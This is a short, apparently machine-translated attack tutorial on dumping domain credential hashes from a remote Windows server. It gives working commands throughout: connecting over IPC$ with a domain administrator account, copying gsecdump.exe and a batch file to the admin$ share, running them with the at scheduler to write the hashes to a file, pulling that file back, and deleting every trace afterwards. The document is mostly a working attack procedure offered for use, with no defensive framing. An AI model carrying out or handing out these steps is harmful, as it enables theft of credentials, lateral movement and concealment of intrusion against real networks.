Use the at command + gsecdump to capture the Hash in the domain environment

// Use the domain administrator account ipc to access a server

 
Net use \ IP address \ ipc $ "password"/user: domain administrator @ current domain name
 
// Copy the local gsecdump.exe file to the C: \ WINDOWS Directory copy gsecdump.exe \ IP address \ admin $
 
// Copy run. bat from the local machine to the C: \ WINDOWS Directory of the other party to copy run. bat \ IP address \ admin $
 
Run. bat contains the following content: C: \ WINDOWS \ gsecdump.exe-u-s> C: \ WINDOWS \ Hash.txt
 
// View the current time of the target server. net time \ IP Address
 
// Add the scheduled task at \ IP address xx: xx "run. bat"
 
// If the generated Hash.txt file is successfully generated after the specified time expires, the dir \ IP address \ admin $ \ Hash.txt
 
// The local machine uses the batch processing file to obtain the Hash content fetch. bat
 
The fetch. bat content is as follows: type \ IP address \ admin $ \ Hash.txt> Domain_Hash.txt
 
// Delete gsecdump.exe del \ IP address \ admin $ \ gsecdump.exe under the target server C: \ Windows Directory
 
// Delete the run. bat del \ IP address \ admin $ \ run. bat under the C: \ WINDOWS Directory of the target server
 
// Delete the Hash.txt del \ IP address \ admin $ \ Hash.txt in the target server C: \ Windows Directory